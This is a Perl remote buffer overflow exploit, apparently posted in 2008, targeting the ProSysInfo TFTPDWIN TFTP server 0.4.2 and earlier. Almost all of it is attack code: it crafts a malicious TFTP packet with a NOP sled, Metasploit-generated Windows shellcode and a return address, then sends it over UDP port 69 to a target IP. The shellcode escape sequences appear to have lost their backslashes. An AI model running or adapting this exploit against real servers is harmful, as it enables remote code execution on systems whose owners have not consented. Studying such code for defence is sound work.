prosystftpd_exploit.pl.txt
Posted on 13 December 2008
#!/usr/bin/perl # # ProSysInfo TFTP server TFTPDWIN <= 0.4.2 # Universal Remote Buffer Overflow Exploit # [Works on all Windows versions.] # ---------------------------------------- # Exploit by SkD (skdrat@hotmail.com) # # Let's take a description from their page at: # http://www.tftpserver.prosysinfo.com.pl # # "The TFTP Server TFTPDWIN software is a # multithreaded TFTP protocol server for # Windows 98/Me/2000/XP/2003. TFTP Server # TFTPDWIN is compatible with RFC 1350, # RFC 2347, RFC 2348, and RFC 2349, documents." # # Some of their clients include: CISCO, Alcatel-Lucent, # Intel, AT&T, Panasonic, Boeing ... # # Wow, all of these companies use this software! # This is pretty much serious. # # So this is my new exploit and I made it universal like # the last one. This overflow was pretty much weird at # first sight, but a bit of looking into the software # can tell you many things about it! # # If Immunity (www.immunityinc.com) can make a commerical # exploit for this and keep it for private clients, # so can I ;) but to the public :). Have fun ladies & # gents. # # Usage: prosystftpd_exploit.pl <target IP> # # Greets fly to InTeL. # # WARNING: Author has no responsibility over the damage # you do using this! use IO::Socket; use warnings; use strict; if(!($ARGV[0])) { print "[x] ProSysInfo TFTP server TFTPDWIN <= 0.4.2 "; print " Universal Remote Buffer Overflow Exploit "; print "[x] Exploit by SkD (skdrat@ hotmail.com) "; print "[x] Usage: prosystftpd_exploit.pl <target IP> "; exit(0); } # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=Pex http://metasploit.com # Restricted chars = 0x00 0x6e 0x65 0x74 my $shellcode = "x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0exaf". "x4fxb9xecx83xeexfcxe2xf4x53xa7xfdxecxafx4fx32xa9". "x93xc4xc5xe9xd7x4ex56x67xe0x57x32xb3x8fx4ex52xa5". "x24x7bx32xedx41x7ex79x75x03xcbx79x98xa8x8ex73xe1". "xaex8dx52x18x94x1bx9dxe8xdaxaax32xb3x8bx4ex52x8a". "x24x43xf2x67xf0x53xb8x07x24x53x32xedx44xc6xe5xc8". "xabx8cx88x2cxcbxc4xf9xdcx2ax8fxc1xe0x24x0fxb5x67". "xdfx53x14x67xc7x47x52xe5x24xcfx09xecxafx4fx32x84". "x93x10x88x1axcfx19x30x14x2cx8fxc2xbcxc7xbfx33xe8". "xf0x27x21x12x25x41xeex13x48x2cxd8x80xccx4fxb9xec"; my $p1="x00x01"; my $p2="x00x6ex65x74x61x73x63x69x69x00"; my $ret = "x5dx10x40"; #0040105D -> :) SkD's Tricks my $nopsled = "x90" x 10; my $len = (274 - length($shellcode)); if($len < 0) { print "[x] Your shellcode is too big! Find another way :) "; exit(0); } my $overflow = "x41" x $len; my $packet = (($p1).($nopsled).($shellcode).(($overflow)).($ret).($p2)); my $sock = new IO::Socket::INET(Proto=>'udp', PeerAddr=>$ARGV[0], PeerPort=>'69'); die "[x] Cannot Connect! " unless $sock; print "[x] Connected to daemon :) "; print "[x] Sending packet.. "; print $sock $packet; sleep(1); close $sock; print "[x] Target owned! "; exit(0);
